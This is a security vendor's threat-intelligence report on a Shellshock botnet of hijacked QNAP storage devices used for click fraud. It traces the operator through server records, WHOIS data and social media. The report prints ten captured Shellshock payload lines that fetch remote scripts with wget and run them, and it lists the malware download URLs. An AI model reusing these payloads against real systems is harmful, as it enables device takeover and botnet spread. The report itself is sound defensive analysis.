Tracking a ShellShock Click Fraud Botnet

How Forkbombus Labs identified the actor of a 2,500 strong click fraud botnet

On June 18th, 2016, Fabio Gapserini, an Italian national was arrested in Amsterdam, Netherlands, at the request of the United States Department of Justice, accused of creating a global botnet of hacked QNAP Network Attached Storage devices with the ultimate motivation of performing advertisement click fraud. In a trial which concluded on August 4th, 2017, Fabio Gasperini was found guilty of computer intrusion. This trial is the conclusion of an investigation which first began in December of 2014.

In this report we cover how Forkbombus Labs Learned Dynamic Deception technology, Hivemind, first discovered the alleged activity, identified the motivation of click fraud behind these attacks, and the ultimate discovery of the botmaster, Fabio Gasperini.

The Initial Exploitation Activity

On December 5th, 2014, Hivemind alerted our analysts to a new Shellshock (CVE-2014-6271) activity sourcing from a QNAP Network Attached Storage device located in Spain (Figure 1).

Figure 1. Initial botnet exploitation event observed by Hivemind

Figure 1. Initial botnet exploitation event observed by Hivemind

Exploited QNAP devices were then instructed to download and execute a bash script, from one of numerous identified sources. Over the course of our investigation, we’ve identified 10 distinct Shellshock payloads related to the botnet. (Figure 2)

Payload Count First Seen (EST) Last Seen (EST)
() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://185.14.30.79/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1 2,511 2014-12-06 02:13:41 2015-03-13 14:54:54
() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://qupn.byethost5.com/gH/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1 600 2014-12-05 10:15:04 2015-03-13 11:01:29
() { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -O /tmp/S0.sh && /bin/sh /tmp/S0.sh 0<&1 2>&1 286 2014-12-17 17:18:20 2015-03-12 17:23:38
() { :; }; /bin/rm -rf /tmp/S0.php /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://x3q.altervista.org/gH/S0.php -O /tmp/S0.sh && /bin/sh /tmp/S0.sh && sh S0.php 0<&1 2>&1 & 125 2014-12-07 09:12:31 2015-03-07 18:27:28
() { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://stanislaw.altervista.org/io.php 0<&1 2>&1 95 2014-12-28 04:35:02 2015-03-05 05:33:55
() { :; }; /bin/rm -rf /tmp/io.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://nyo2k2.altervista.org/io.php -P /tmp && /bin/rm /tmp/io.php 0<&1 2>&1 77 2014-12-14 02:09:00 2015-02-04 21:47:37
() { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1 40 2015-01-06 13:17:16 2015-03-09 02:32:43
() { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -O /tmp/S0.sh && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -P /tmp && /bin/sh /tmp/S0.php 0<&1 2>&1 5 2014-12-18 09:48:53 2015-02-02 22:03:24
() { :; }; rm -rf S00.sh && /usr/bin/wget -c http://185.14.30.79/S00.sh && /bin/sh S00.sh && echo ok 0<&1 2>&1 1 2014-12-08 14:03:00 2014-12-08 14:03:00
() { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && wget -c http://192.192.78.216:9090/gH/S0.php -O /tmp/S0.sh && /bin/sh /tmp/S0.sh 0<&1 2>&1 1 2014-12-22 18:56:43 2014-12-22 18:56:43

Figure 2. Table highlighting the details of observed shellshock payloads

From these Shellshock payloads, 8 distinct URLs were instructed to be downloaded.

  • http://qupn.byethost5.com/gH/S0.sh
  • http://185.14.30.79/S0.sh
  • http://x3q.altervista.org/gH/S0.php
  • http://185.14.30.79/S00.sh
  • http://nyo2k2.altervista.org/io.php
  • http://192.192.78.216:9090/gH/S0.php
  • http://stanislaw.altervista.org/io.php
  • http://lliillii.altervista.org/io.php

With the exception of URLs ending in io.php, these files configured the QNAP devices to download further resources, join the botnet, and engage in further worm-type propagation. These S0 scripts additionally served several other purposes (Figures 3 through 8).

Figure 3. Adding a backdoor administrator Linux user account

Figure 3. Adding a backdoor administrator Linux user account

Figure 4. Creation of a publicly accessible unauthenticated webshell

Figure 4. Creation of a publicly accessible unauthenticated webshell

Figure 5. Creating an SSH service running on port 26

Figure 5. Creating an SSH service running on port 26

Figure 6. Patching the QNAP NAS Device for the Shellshock vulnerability, preventing further exploitation

Figure 6. Patching the QNAP NAS Device for the Shellshock vulnerability, preventing further exploitation

Figure 7. Downloading and execution of a Lightaidra IRC Bot binary of matching system architecture

Figure 7. Downloading and execution of a Lightaidra IRC Bot binary of matching system architecture

Figure 8. Execution of pnscan configured to further spread the botnet

Figure 8. Execution of pnscan configured to further spread the botnet

Lightaidra IRC Bot

Above, Figure 6 highlights the botnet’s installation script downloading a Lightaidra IRC Bot binary, and configures the QNAP Botnet to run the Lightaidra IRC Bot binary on startup. Examining this binary gives us some initial clues.

$ sha256sum ..32
fe18e7a49018ef331819bb8eae2961fa36ac099933d5a34a5f53c9c61b79e14c  ..32
$ md5sum ..32
dc2f1b4cb4a348c6f9abe598e72c486b  ..32

Hash values of the 32 bit Lightaidra IRC Bot Binary

Executing strings on the binary reveals the binary is configured to connect to an IRC server located at 192.79.153.207 over port 6667, and join the channel #aidra (Figure 9).

Figure 9. IRC Server configuration from the Lightaidra IRC Bot Binary

Figure 9. IRC Server configuration from the Lightaidra IRC Bot Binary

The string UPX! is also observed several times, indicating the file has been packed with the UPX packer. Attempting to use UPX to unpack the ..32 file proves successful.

$ upx-ucl -d ..32
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     48318 <-     21872   45.27%  netbsd/elf386  ..32

Unpacked 1 file.

Unpacking the ..32 Lightaidra IRC Bot Binary

The unpacked binary now reveals several strings of interest. The Lightaidra IRC Bot binary attempts to retrieve its public IP address by accessing http://ip.betfair2.eu/ip located at the 178.79.183.247 address (Figure 10). Notably, the betfair2.eu domain appears to be reference to the Betfair online casino.

Figure 10. Lightaidra IRC Bot Binary reaching out to ip.betfair2.eu to find its public IP address

Figure 10. Lightaidra IRC Bot Binary reaching out to ip.betfair2.eu to find its public IP address

185.14.30.79

The 185.14.30.79 host was observed in the most prolific Shellshock payload. Research of this host reveals it was leased by UAServers. Performing a PTR record lookup for the 185.14.30.79 host revealed a domain name of gaspolo.uaservers.net (Figure 11). At the time, UAServer’s was known to register PTR records with their client’s usernames, linked to the leased hosts, suggesting gaspolo is the username of the server’s renter.

Figure 11. PTR record of the 185.14.30.79 host

Figure 11. PTR record of the 185.14.30.79 host

185.14.30.79/S00.sh

In addition to the most prolific http://185.14.30.79/S0.sh script, another script (http://185.14.30.79/S00.sh) was observed a single time on December 8th, 2014, sourcing from a residential Italian IP address 93.40.91.149. While largely performing the same activity highlighted above in Figures 3 through 8, this script also downloads two further resources, 23.231.6.11/emme, and 23.231.6.11/cl (Figure 12).

Figure 12. Scripts unique to the 185.14.30.79/S00.sh script

Figure 12. Scripts unique to the 185.14.30.79/S00.sh script

23.231.6.11/cl

The http://23.231.6.11/cl file is another Bash shell script. The purpose of this script is to identify CCcam Card Sharing credentials, and exfiltrate them to a script hosted at ppoolloo.altervista.org (Figure 13).

Figure 13. The 23.231.6.11/cl CCcam card sharing credential exfiltration script

Figure 13. The 23.231.6.11/cl CCcam card sharing credential exfiltration script

23.231.6.11/emme

The http://23.231.6.11/emme script is another Bash shell script. The purpose of this script is to fraudulently view advertisements served by the JuiceADV advertisement service. This script reveals the user’s JuiceADV numeric user ID, and also the domain name sempreinformato.eu which is meant to serve as the HTTP referrer of the visited advertisements. Part of this script retrieves a random HTTP User Agent string from a script located at http://178.79.183.247/agent.php (Figure 14).

Figure 14. An excerpt of 23.231.6.11/emme which fraudulently “views” advertisements

Figure 14. An excerpt of 23.231.6.11/emme which fraudulently “views” advertisements

Notably, the 178.79.183.247 host is the same which was used to retrieve a bot’s public IP address detailed above in the Lightaidra IRC Bot Binary section.

Sempreinformato.eu

The sempreinformato.eu domain name was observed as the referrer for advertisements which the botnet fraudulently viewed. “Sempre Informato” roughly translates from Italian to English as “Always Informed”, supporting an Italian theme. The sempreinformato.eu site is reportedly registered to a user with the e-mail of [email protected] (Figure 15). Note the email of [email protected], which matches the formerly discovered subdomain from the gaspolo.uaservers.net host.

Figure 15. Whois information for sempreinformato.eu

Figure 15. Whois information for sempreinformato.eu

93.40.91.149

The Italian host 93.40.91.149 was observed once by Hivemind on December 8th, 2014. According to an nmap scan performed on December 21st, the IP does not appear to host any services (Figure 16).

Figure 16. Nmap scan of the 93.40.91.149 host for common service ports

Figure 16. Nmap scan of the 93.40.91.149 host for common service ports

This host was observed scanning with the S00.sh propagation script, which distinctly from the rest of the observed propagation scripts, contains references to a domain name registered to a citizen of Rome. These facts make it likely that the 93.40.91.149 host was in use by the attacker at the time of the attacks, and is not itself a separate compromised host.

[email protected] Email Address

The Google account Gaspolo was retrieved from the whois of the SempreInformato.eu website. The Gaspolo alias matches the subdomain retrieved from the PTR record of the heavily utilized 185.14.30.79 asset. Initiating a Google Account recovery process for the [email protected] account reveals the owner is named “Fabio Gasperini” (Figure 17).

Figure 17. Google account recovery for gaspolo@gmail.com

Figure 17. Google account recovery for [email protected]

Performing a Google search for [email protected] revealed several links, including several blogspot.com blogs Fabio has authored regarding video game hacking (particularly Facebook games, such as “Pet Society”), where he guides his readers on how to cheat and “hack” these video games. The search also reveals mailing list results from as early as 2005 regarding system administration.

Fabio “Gaspolo” Gasperini

Performing a Google search for “Fabio Gaspolo Gasperini” reveals a Facebook post from Fabio Gasperini on November 15th, 2009, in which he promotes his (now defunct) website gaspolo.it on a Facebook page titled “Pet Society tips, Tricks and Cheats” (Figure 18). Further, Fabio lists himself as living in Centocelle, Lazio, Italy, which is a section of Rome, Italy (Figure 19).

Figure 18. Fabio Gasperini’s Facebook page, listing his residence

Figure 18. Fabio Gasperini’s Facebook page, listing his residence

Figure 19. Fabio Gasperini advertising his website gaspolo.it on Facebook

Figure 19. Fabio Gasperini advertising his website gaspolo.it on Facebook

Tying It All Together

Through our research, we’ve been able to identify over 2,500 distinct hosts involved in this activity. The most prolific host used in the propagation of botnet resources, 185.14.30.79, gives us our first clue as to the botmasters identity- The nickname Gaspolo. Analyzing the retrieved IRC bot binary reveals other related indicators, such as the 178.79.183.247 IP address. While monitoring for related activity, Hivemind was able to identify the lone S00.sh attempt which offers the direct insight to the Advertisement Fraud and Card Sharing Credential Theft motivations of the attacker.

The advertisement fraud provides our first real glimpse at our attacker. This also gives the first indication that the party responsible for the infrastructure and propagation of the botnet is the same individual who is profiting from the advertisement fraud: Gaspolo. By exploring information related to the uncovered gaspolo identities reveals his true identity as Fabio Gasperini, a citizen of Rome, Italy.

While the botnet was observed propagating in a worm fashion, the exploit attempt which strongly leads to identifying the attacker as Fabio Gasperini also sources from a residential Italian connection which itself did not reveal itself as a QNAP NAS (or any particular) device. Furthermore, resources used in the advertisement fraud were also used in the IRC Bot propagation. This shared resource being linked to betfair2.eu, potentially being related to the European Gambling website Betfair, which is later correlated with Bleeping Computer’s article introducing Fabio’s employment with an online Gambling website.

Hivemind Intelligent Deception

Hivemind is Forkbombus Labs’ patent pending A.I. Driven Deception Technology. Standard honeypots and deception technologies imitate a predetermined service or environment. This becomes problematic as attackers capabilities and interests often differ than what static deceptions offer. Despite attackers stumbling upon static honeypots, these technologies are often overlooked by attackers who favor different scenarios. When attackers fail to engage with deception technologies, defenders fail to gain valuable intelligence which enables intelligent responses to attacks.

As Hivemind learns an attacker’s capabilities and motivations, Hivemind sensors instantly alter their appearance to each attacker to emulate what they are most likely to interact with. Hivemind ensures attackers are more likely to engage Hivemind sensors, leveraging attackers to divulge unparalleled information about themselves and their intentions as possible. This enhanced collections capabilities enables defenders to rapidly detect attacker’s resources, motivations, and identities, allowing defenders to respond to threats quicker and more intelligently than ever before. Attackers that engage with Hivemind increase their costs while saving defenders time and money.

The information in this article is provided as is and without warranty and does not represent professional advice or services.
Forkbombus Labs is not responsible for any loss or damages from actions taken based on information within this publication.

In the interest of saving space and protecting non-suspect identities, some images may be redacted or cropped. Forkbombus Labs asserts that no provided evidence has been altered or misrepresented, and only non-contributing information has been redacted.

While all information represented in this document is believed to be accurate, Forkbombus Labs and any contributing entities are not responsible or liable for repercussions from the use or misuse of any information provided throughout this document, or in any resulting correspondence related to this document. Receiving parties are responsible for independently verifying the information outlined in this document.